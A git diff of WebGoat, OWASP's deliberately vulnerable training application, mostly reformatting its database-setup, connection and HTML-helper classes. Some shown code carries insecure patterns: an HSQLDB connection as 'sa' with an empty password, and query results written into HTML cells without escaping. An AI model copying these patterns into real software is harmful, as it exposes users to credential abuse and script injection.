-	String insertData1 = "INSERT INTO auth VALUES('employee', 'Logout')";
-	String insertData2 = "INSERT INTO auth VALUES('employee', 'ListStaff')";
-	String insertData3 = "INSERT INTO auth VALUES('employee', 'ViewProfile')";
-	String insertData4 = "INSERT INTO auth VALUES('employee', 'EditProfile')";
-	String insertData4_1 = "INSERT INTO auth VALUES('employee', 'SearchStaff')";
-	String insertData4_2 = "INSERT INTO auth VALUES('employee', 'FindProfile')";
-	String insertData5 = "INSERT INTO auth VALUES('manager', 'Logout')";
-	String insertData6 = "INSERT INTO auth VALUES('manager', 'ListStaff')";
-	String insertData7 = "INSERT INTO auth VALUES('manager', 'ViewProfile')";
-	String insertData7_1 = "INSERT INTO auth VALUES('manager', 'SearchStaff')";
-	String insertData7_2 = "INSERT INTO auth VALUES('manager', 'FindProfile')";
-	//		String insertData8 = "INSERT INTO auth VALUES('manager', 'EditProfile')";
-	//		String insertData9 = "INSERT INTO auth VALUES('manager', 'CreateProfile')";
-	//		String insertData10 = "INSERT INTO auth VALUES('manager', 'DeleteProfile')";
-	//		String insertData11 = "INSERT INTO auth VALUES('manager', 'UpdateProfile')";
-	String insertData12 = "INSERT INTO auth VALUES('hr', 'Logout')";
-	String insertData13 = "INSERT INTO auth VALUES('hr', 'ListStaff')";
-	String insertData14 = "INSERT INTO auth VALUES('hr', 'ViewProfile')";
-	String insertData15 = "INSERT INTO auth VALUES('hr', 'EditProfile')";
-	String insertData16 = "INSERT INTO auth VALUES('hr', 'CreateProfile')";
-	String insertData17 = "INSERT INTO auth VALUES('hr', 'DeleteProfile')";
-	String insertData18 = "INSERT INTO auth VALUES('hr', 'UpdateProfile')";
-	String insertData18_1 = "INSERT INTO auth VALUES('hr', 'SearchStaff')";
-	String insertData18_2 = "INSERT INTO auth VALUES('hr', 'FindProfile')";
-	String insertData19 = "INSERT INTO auth VALUES('admin', 'Logout')";
-	String insertData20 = "INSERT INTO auth VALUES('admin', 'ListStaff')";
-	String insertData21 = "INSERT INTO auth VALUES('admin', 'ViewProfile')";
-	String insertData22 = "INSERT INTO auth VALUES('admin', 'EditProfile')";
-	String insertData23 = "INSERT INTO auth VALUES('admin', 'CreateProfile')";
-	String insertData24 = "INSERT INTO auth VALUES('admin', 'DeleteProfile')";
-	String insertData25 = "INSERT INTO auth VALUES('admin', 'UpdateProfile')";
-	String insertData25_1 = "INSERT INTO auth VALUES('admin', 'SearchStaff')";
-	String insertData25_2 = "INSERT INTO auth VALUES('admin', 'FindProfile')";
-
-	// Add a permission for the webgoat role to see the source.
-	// The challenge(s) will change the default role to "challenge" 
-	String insertData26 = "INSERT INTO auth VALUES('"
-		+ AbstractLesson.USER_ROLE + "','" + WebSession.SHOWSOURCE
-		+ "')";
-	String insertData27 = "INSERT INTO auth VALUES('"
-		+ AbstractLesson.USER_ROLE + "','" + WebSession.SHOWHINTS
-		+ "')";
-	// Add a permission for the webgoat role to see the solution.
-	// The challenge(s) will change the default role to "challenge" 
-	String insertData28 = "INSERT INTO auth VALUES('"
-		+ AbstractLesson.USER_ROLE + "','" + WebSession.SHOWSOLUTION
-		+ "')";
-
-	statement.executeUpdate(insertData1);
-	statement.executeUpdate(insertData2);
-	statement.executeUpdate(insertData3);
-	statement.executeUpdate(insertData4);
-	statement.executeUpdate(insertData4_1);
-	statement.executeUpdate(insertData4_2);
-	statement.executeUpdate(insertData5);
-	statement.executeUpdate(insertData6);
-	statement.executeUpdate(insertData7);
-	statement.executeUpdate(insertData7_1);
-	statement.executeUpdate(insertData7_2);
-	//		statement.executeUpdate(insertData8);
-	//		statement.executeUpdate(insertData9);
-	//		statement.executeUpdate(insertData10);
-	//		statement.executeUpdate(insertData11);
-	statement.executeUpdate(insertData12);
-	statement.executeUpdate(insertData13);
-	statement.executeUpdate(insertData14);
-	statement.executeUpdate(insertData15);
-	statement.executeUpdate(insertData16);
-	statement.executeUpdate(insertData17);
-	statement.executeUpdate(insertData18);
-	statement.executeUpdate(insertData18_1);
-	statement.executeUpdate(insertData18_2);
-	statement.executeUpdate(insertData19);
-	statement.executeUpdate(insertData20);
-	statement.executeUpdate(insertData21);
-	statement.executeUpdate(insertData22);
-	statement.executeUpdate(insertData23);
-	statement.executeUpdate(insertData24);
-	statement.executeUpdate(insertData25);
-	statement.executeUpdate(insertData25_1);
-	statement.executeUpdate(insertData25_2);
-	statement.executeUpdate(insertData26);
-	statement.executeUpdate(insertData27);
-	statement.executeUpdate(insertData28);
-    }
-
-
-    private void createOwnershipTable(Connection connection)
-	    throws SQLException
-    {
-	Statement statement = connection.createStatement();
-
-	try
-	{
-	    String dropTable = "DROP TABLE ownership";
-	    statement.executeUpdate(dropTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error: unable to drop ownership");
-	}
-
-	try
-	{
-	    String createTable = "CREATE TABLE ownership ("
-		    + "employer_id INT NOT NULL," + "employee_id INT NOT NULL,"
-		    + "PRIMARY KEY (employee_id, employer_id)" + ")";
-
-	    statement.executeUpdate(createTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error: unable to create ownership table");
-	}
-
-	String inputData = "INSERT INTO ownership VALUES (112, 101)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (112, 102)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (112, 103)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (112, 104)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (112, 105)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (112, 106)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (112, 107)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (112, 108)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (112, 109)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (112, 110)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (112, 111)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (112, 112)";
-	statement.executeUpdate(inputData);
-
-	inputData = "INSERT INTO ownership VALUES (102, 101)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (102, 102)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (102, 103)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (102, 104)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (102, 105)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (102, 106)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (102, 107)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (102, 108)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (102, 109)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (102, 110)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (102, 111)";
-	statement.executeUpdate(inputData);
-
-	inputData = "INSERT INTO ownership VALUES (111, 101)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (111, 102)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (111, 103)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (111, 104)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (111, 105)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (111, 106)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (111, 107)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (111, 108)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (111, 109)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (111, 110)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (111, 111)";
-	statement.executeUpdate(inputData);
-
-	inputData = "INSERT INTO ownership VALUES (106, 105)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (106, 106)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (106, 110)";
-	statement.executeUpdate(inputData);
-
-	inputData = "INSERT INTO ownership VALUES (101, 101)";
-	statement.executeUpdate(inputData);
-
-	inputData = "INSERT INTO ownership VALUES (103, 103)";
-	statement.executeUpdate(inputData);
-
-	inputData = "INSERT INTO ownership VALUES (107, 104)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (107, 108)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (107, 109)";
-	statement.executeUpdate(inputData);
-	inputData = "INSERT INTO ownership VALUES (107, 107)";
-	statement.executeUpdate(inputData);
-
-	inputData = "INSERT INTO ownership VALUES (105, 105)";
-	statement.executeUpdate(inputData);
-
-	inputData = "INSERT INTO ownership VALUES (110, 110)";
-	statement.executeUpdate(inputData);
-
-	inputData = "INSERT INTO ownership VALUES (104, 104)";
-	statement.executeUpdate(inputData);
-
-	inputData = "INSERT INTO ownership VALUES (108, 108)";
-	statement.executeUpdate(inputData);
-
-	inputData = "INSERT INTO ownership VALUES (109, 109)";
-	statement.executeUpdate(inputData);
-
-    }
-
-
-    //--------------------------------------------------------------------------
-    //
-    //  End of WebGoat Financials
-    //
-    //--------------------------------------------------------------------------
-
-    /**
-     * Description of the Method
-     *
-     * @param connection Description of the Parameter
-     *
-     * @exception SQLException Description of the Exception
-     */
-    public void makeDB(Connection connection) throws SQLException
-    {
-	System.out.println("Successful connection to database");
-	createUserDataTable(connection);
-	createLoginTable(connection);
-	createUserAdminTable(connection);
-	createProductTable(connection);
-	createMessageTable(connection);
-	createEmployeeTable(connection);
-	createRolesTable(connection);
-	createAuthTable(connection);
-	createOwnershipTable(connection);
-	createWeatherDataTable(connection);
-	System.out.println("Success: creating tables.");
-    }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/DatabaseUtilities.java b/main/project/JavaSource/org/owasp/webgoat/session/DatabaseUtilities.java
index b208677d8..abb047f8e 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/DatabaseUtilities.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/DatabaseUtilities.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.session;
 
 import java.io.IOException;
@@ -8,42 +9,40 @@ import java.sql.ResultSetMetaData;
 import java.sql.SQLException;
 import java.util.HashMap;
 import java.util.Map;
-
 import org.apache.ecs.MultiPartElement;
 import org.apache.ecs.html.B;
 import org.apache.ecs.html.TD;
 import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
  */
 public class DatabaseUtilities
@@ -51,121 +50,119 @@ public class DatabaseUtilities
 
 	private static Map<String, Connection> connections = new HashMap<String, Connection>();
 	private static Map<String, Boolean> dbBuilt = new HashMap<String, Boolean>();
-	
-	public static Connection getConnection(WebSession s) 
-	throws ClassNotFoundException, SQLException 
+
+	public static Connection getConnection(WebSession s) throws ClassNotFoundException, SQLException
 	{
 		return getConnection(s.getUserName(), s.getWebgoatContext());
 	}
-	
-	public static synchronized Connection getConnection(String user, WebgoatContext context) 
-		throws ClassNotFoundException, SQLException 
+
+	public static synchronized Connection getConnection(String user, WebgoatContext context)
+			throws ClassNotFoundException, SQLException
 	{
 		Connection conn = connections.get(user);
-		if (conn != null && !conn.isClosed())
-			return conn;
+		if (conn != null && !conn.isClosed()) return conn;
 		conn = makeConnection(user, context);
 		connections.put(user, conn);
-		
-		if (dbBuilt.get(user) == null) {
+
+		if (dbBuilt.get(user) == null)
+		{
 			new CreateDB().makeDB(conn);
 			dbBuilt.put(user, Boolean.TRUE);
 		}
-		
+
 		return conn;
 	}
-	
+
 	public static synchronized void returnConnection(String user)
 	{
 		try
 		{
-		Connection connection = connections.get(user);
-		if (connection == null || connection.isClosed())
-			return;
-		
-		if (connection.getMetaData().getDatabaseProductName().toLowerCase().contains("oracle"))
-			connection.close();
-		}
-		catch (SQLException sqle)
+			Connection connection = connections.get(user);
+			if (connection == null || connection.isClosed()) return;
+
+			if (connection.getMetaData().getDatabaseProductName().toLowerCase().contains("oracle")) connection.close();
+		} catch (SQLException sqle)
 		{
 			sqle.printStackTrace();
 		}
 	}
-	
-    private static Connection makeConnection(String user, WebgoatContext context)
-    	throws ClassNotFoundException, SQLException
-    {
+
+	private static Connection makeConnection(String user, WebgoatContext context) throws ClassNotFoundException,
+			SQLException
+	{
 		Class.forName(context.getDatabaseDriver());
 
-		if (context.getDatabaseConnectionString().contains("hsqldb"))
-    		return getHsqldbConnection(user, context);
-		
+		if (context.getDatabaseConnectionString().contains("hsqldb")) return getHsqldbConnection(user, context);
+
 		String userPrefix = context.getDatabaseUser();
 		String password = context.getDatabasePassword();
 		String url = context.getDatabaseConnectionString();
 		return DriverManager.getConnection(url, userPrefix + "_" + user, password);
-    }
+	}
 
-    private static Connection getHsqldbConnection(String user, WebgoatContext context)
-	throws ClassNotFoundException, SQLException
+	private static Connection getHsqldbConnection(String user, WebgoatContext context) throws ClassNotFoundException,
+			SQLException
 	{
 		String url = context.getDatabaseConnectionString().replaceAll("\\$\\{USER\\}", user);
 		return DriverManager.getConnection(url, "sa", "");
 	}
-    /**
-     * Description of the Method
-     *
-     * @param results Description of the Parameter
-     * @param resultsMetaData Description of the Parameter
-     *
-     * @return Description of the Return Value
-     *
-     * @exception IOException Description of the Exception
-     * @exception SQLException Description of the Exception
-     */
-    public static MultiPartElement writeTable(ResultSet results,
-	    ResultSetMetaData resultsMetaData) throws IOException, SQLException
-    {
-	int numColumns = resultsMetaData.getColumnCount();
-	results.beforeFirst();
 
-	if (results.next())
+	/**
+	 * Description of the Method
+	 * 
+	 * @param results
+	 *            Description of the Parameter
+	 * @param resultsMetaData
+	 *            Description of the Parameter
+	 * 
+	 * @return Description of the Return Value
+	 * 
+	 * @exception IOException
+	 *                Description of the Exception
+	 * @exception SQLException
+	 *                Description of the Exception
+	 */
+	public static MultiPartElement writeTable(ResultSet results, ResultSetMetaData resultsMetaData) throws IOException,
+			SQLException
 	{
-	    Table t = new Table(1); // 1 = with border
-	    t.setCellPadding(1);
+		int numColumns = resultsMetaData.getColumnCount();
+		results.beforeFirst();
 
-	    TR tr = new TR();
-
-	    for (int i = 1; i < (numColumns + 1); i++)
-	    {
-		tr.addElement(new TD(new B(resultsMetaData.getColumnName(i))));
-	    }
-
-	    t.addElement(tr);
-	    results.beforeFirst();
-
-	    while (results.next())
-	    {
-		TR row = new TR();
-
-		for (int i = 1; i < (numColumns + 1); i++)
+		if (results.next())
 		{
-			String str = results.getString(i);
-			if (str == null)
-				str = "";
-		    row.addElement(new TD(str.replaceAll(" ", "&nbsp;")));
+			Table t = new Table(1); // 1 = with border
+			t.setCellPadding(1);
+
+			TR tr = new TR();
+
+			for (int i = 1; i < (numColumns + 1); i++)
+			{
+				tr.addElement(new TD(new B(resultsMetaData.getColumnName(i))));
+			}
+
+			t.addElement(tr);
+			results.beforeFirst();
+
+			while (results.next())
+			{
+				TR row = new TR();
+
+				for (int i = 1; i < (numColumns + 1); i++)
+				{
+					String str = results.getString(i);
+					if (str == null) str = "";
+					row.addElement(new TD(str.replaceAll(" ", "&nbsp;")));
+				}
+
+				t.addElement(row);
+			}
+
+			return (t);
+		}
+		else
+		{
+			return (new B("Query Successful; however no data was returned from this query."));
 		}
-
-		t.addElement(row);
-	    }
-
-	    return (t);
 	}
-	else
-	{
-	    return (new B(
-		    "Query Successful; however no data was returned from this query."));
-	}
-    }
-    
+
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java b/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java
index 70484ff1d..547c89fd3 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java
@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.session;
 
 import java.util.Iterator;
 import java.util.List;
 import java.util.StringTokenizer;
 import java.util.Vector;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -21,695 +21,726 @@ import org.apache.ecs.html.TH;
 import org.apache.ecs.html.TR;
 import org.apache.ecs.html.U;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams (jeff.williams@aspectsecurity.com)
- * @created    October 29, 2003
+ * 
+ * @author Jeff Williams (jeff.williams@aspectsecurity.com)
+ * @created October 29, 2003
  */
 
 public class ECSFactory
 {
 
-    /**
-     *  Description of the Field
-     */
+	/**
+	 * Description of the Field
+	 */
 
-    public final static String ON = "On";
+	public final static String ON = "On";
 
-    /**
-     *  Description of the Field
-     */
+	/**
+	 * Description of the Field
+	 */
 
-    public final static String PASSWORD = "Password";
+	public final static String PASSWORD = "Password";
 
+	/**
+	 * Don't let anyone instantiate this class
+	 */
 
-    /**
-     *  Don't let anyone instantiate this class
-     */
-
-    private ECSFactory()
-    {}
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  name   Description of the Parameter
-     * @param  value  Description of the Parameter
-     * @return        Description of the Return Value
-     */
-
-    public static Element makeBox(String name, String value)
-    {
-
-	Input i = new Input(Input.CHECKBOX, name, ON);
-
-	i.setChecked(value.equals(ON));
-
-	return (i);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  text  Description of the Parameter
-     * @return       Description of the Return Value
-     */
-
-    public static Element makeButton(String text)
-    {
-
-	Input b = new Input();
-
-	b.setType(Input.SUBMIT);
-	b.setValue(text);
-	b.setName(Input.SUBMIT);
-
-	return (b);
-    }
-
-    public static Element makeButton(String text, String onClickFunction)
-    {
-
-	Input b = (Input)makeButton(text);
-	b.setOnClick(onClickFunction);
-	
-	return (b);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  labeltext  Description of the Parameter
-     * @param  value      Description of the Parameter
-     * @param  e          Description of the Parameter
-     * @return            Description of the Return Value
-     */
-
-    public static TR makeField(String labeltext, String value, Element e)
-    {
-
-	TD left = new TD().setAlign("right");
-
-	Label label = new Label().addElement(labeltext);
-
-	left.addElement(label);
-
-	TD right = new TD().setAlign("left");
-
-	right.addElement(e);
-
-	TR row = new TR();
-
-	row.addElement(left);
-
-	row.addElement(right);
-
-	return (row);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  labeltext  Description of the Parameter
-     * @param  name       Description of the Parameter
-     * @param  value      Description of the Parameter
-     * @param  size       Description of the Parameter
-     * @return            Description of the Return Value
-     */
-
-    public static TR makeField(String labeltext, String name, String value,
-	    int size)
-    {
-
-	Input field = new Input().setName(name).setValue(value).setSize(size)
-		.setMaxlength(size);
-
-	// double check in case someone means to make a * starred out password field
-
-	if (name.equals(PASSWORD))
+	private ECSFactory()
 	{
-
-	    field.setType(Input.PASSWORD);
-
 	}
 
-	return (makeField(labeltext, value, field));
-    }
+	/**
+	 * Description of the Method
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  label      Description of the Parameter
-     * @param  type       Description of the Parameter
-     * @param  name       Description of the Parameter
-     * @param  value      Description of the Parameter
-     * @param  alignment  Description of the Parameter
-     * @param  selected   Description of the Parameter
-     * @return            Description of the Return Value
-     */
-
-    public static Element makeInput(String label, String type, String name,
-	    boolean value, boolean selected, String alignment)
-    {
-
-	return makeInput(label, type, name, new Boolean(value).toString(),
-		selected, alignment);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  label  Description of the Parameter
-     * @param  type   Description of the Parameter
-     * @param  name   Description of the Parameter
-     * @param  value  Description of the Parameter
-     * @return        Description of the Return Value
-     */
-
-    public static Element makeInput(String label, String type, String name,
-	    String value)
-    {
-
-	return makeInput(label, type, name, value, new Boolean(value)
-		.booleanValue(), "RIGHT");
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  label      Description of the Parameter
-     * @param  type       Description of the Parameter
-     * @param  name       Description of the Parameter
-     * @param  value      Description of the Parameter
-     * @param  alignment  Description of the Parameter
-     * @param  selected   Description of the Parameter
-     * @return            Description of the Return Value
-     */
-
-    public static Element makeInput(String label, String type, String name,
-	    String value, boolean selected, String alignment)
-    {
-
-	ElementContainer ec = new ElementContainer();
-
-	if (!alignment.equalsIgnoreCase("LEFT"))
+	public static Element makeBox(String name, String value)
 	{
 
-	    ec.addElement(new StringElement(label));
+		Input i = new Input(Input.CHECKBOX, name, ON);
 
+		i.setChecked(value.equals(ON));
+
+		return (i);
 	}
 
-	Input input = new Input(type, name, value);
+	/**
+	 * Description of the Method
+	 * 
+	 * @param text
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
 
-	ec.addElement(input);
-
-	if (alignment.equalsIgnoreCase("LEFT"))
+	public static Element makeButton(String text)
 	{
 
-	    ec.addElement(new StringElement(label));
+		Input b = new Input();
 
+		b.setType(Input.SUBMIT);
+		b.setValue(text);
+		b.setName(Input.SUBMIT);
+
+		return (b);
 	}
 
-	if (type.equalsIgnoreCase("CHECKBOX"))
+	public static Element makeButton(String text, String onClickFunction)
 	{
 
-	    input.setChecked(selected);
+		Input b = (Input) makeButton(text);
+		b.setOnClick(onClickFunction);
 
+		return (b);
 	}
 
-	return (ec);
-    }
+	/**
+	 * Description of the Method
+	 * 
+	 * @param labeltext
+	 *            Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
+	 * @param e
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  text   Description of the Parameter
-     * @param  name   Description of the Parameter
-     * @param  value  Description of the Parameter
-     * @return        Description of the Return Value
-     */
-
-    public static A makeLink(String text, String name, String value)
-    {
-
-	String href = "attack?" + name;
-
-	if (value.length() > 0)
+	public static TR makeField(String labeltext, String value, Element e)
 	{
 
-	    href = href + "=" + value;
+		TD left = new TD().setAlign("right");
 
+		Label label = new Label().addElement(labeltext);
+
+		left.addElement(label);
+
+		TD right = new TD().setAlign("left");
+
+		right.addElement(e);
+
+		TR row = new TR();
+
+		row.addElement(left);
+
+		row.addElement(right);
+
+		return (row);
 	}
 
-	A a = new A(href);
+	/**
+	 * Description of the Method
+	 * 
+	 * @param labeltext
+	 *            Description of the Parameter
+	 * @param name
+	 *            Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
+	 * @param size
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
 
-	a.addElement(new U().addElement(text));
-
-	a.addAttribute("style", "cursor:hand");
-
-	return (a);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  text   Description of the Parameter
-     * @param  name   Description of the Parameter
-     * @param  value  Description of the Parameter
-     * @return        Description of the Return Value
-     */
-
-    public static A makeLink(String text, String name, int value)
-    {
-
-	return (makeLink(text, name, Integer.toString(value)));
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  text   Description of the Parameter
-     * @param  name   Description of the Parameter
-     * @param  value  Description of the Parameter
-     * @return        Description of the Return Value
-     */
-
-    public static A makeLink(String text, String name, boolean value)
-    {
-
-	return (makeLink(text, name, new Boolean(value).toString()));
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  text         Description of the Parameter
-     * @param  clickAction  Description of the Parameter
-     * @param  type         Description of the Parameter
-     * @return              Description of the Return Value
-     */
-
-    public static Input makeOnClickInput(String text, String clickAction,
-	    String type)
-    {
-
-	Input b = new Input();
-
-	b.setType(type);
-
-	b.setValue(text);
-
-	b.setOnClick(clickAction);
-
-	return (b);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  labeltext  Description of the Parameter
-     * @param  value      Description of the Parameter
-     * @param  e          Description of the Parameter
-     * @return            Description of the Return Value
-     */
-
-    public static TR makeOption(String labeltext, String value, Element e)
-    {
-
-	TD left = new TD().setAlign("left").setWidth("10%");
-
-	left.addElement(e);
-
-	TD right = new TD().setAlign("right");
-
-	Label label = new Label().addElement(labeltext);
-
-	right.addElement(label);
-
-	TR row = new TR();
-
-	row.addElement(right);
-
-	row.addElement(left);
-
-	return (row);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  label  Description of the Parameter
-     * @param  value  Description of the Parameter
-     * @return        Description of the Return Value
-     */
-
-    public static Option makeOption(String label, boolean value)
-    {
-
-	Option option = new Option(label, new Boolean(value).toString());
-
-	option.setSelected(value);
-
-	return option;
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  line  Description of the Parameter
-     * @return       Description of the Return Value
-     */
-
-    private static org.apache.ecs.html.Option makeOption(String line)
-    {
-
-	StringTokenizer st = new StringTokenizer(line, "|");
-
-	org.apache.ecs.html.Option o = new org.apache.ecs.html.Option();
-
-	String token = "";
-
-	if (st.hasMoreTokens())
+	public static TR makeField(String labeltext, String name, String value, int size)
 	{
 
-	    token = st.nextToken();
+		Input field = new Input().setName(name).setValue(value).setSize(size).setMaxlength(size);
 
-	}
+		// double check in case someone means to make a * starred out password field
 
-	o.addElement(token);
-
-	return (o);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  name     Description of the Parameter
-     * @param  options  Description of the Parameter
-     * @return          Description of the Return Value
-     */
-
-    public static Element makePulldown(String name, List<String> options)
-    {
-
-	Select s = new Select(name);
-
-	s.addElement(options.toArray(new String[options.size()]));
-
-	return (s);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  results  Description of the Parameter
-     * @return          Description of the Return Value
-     */
-
-    public static Element makePulldown(String name, String results)
-    {
-
-	Select select = new Select(name);
-
-	StringTokenizer st = new StringTokenizer(results, "\n");
-
-	if (!st.hasMoreTokens())
-	{
-
-	    return (new StringElement(""));
-	}
-
-	while (st.hasMoreTokens())
-	{
-
-	    String line = st.nextToken();
-
-	    select.addElement(makeOption(line));
-
-	}
-
-	select.addElement("-------------------------");
-
-	return (select);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  name         Description of the Parameter
-     * @param  list         Description of the Parameter
-     * @param  selected     Description of the Parameter
-     * @param  rowsShowing  Description of the Parameter
-     * @return              Description of the Return Value
-     */
-
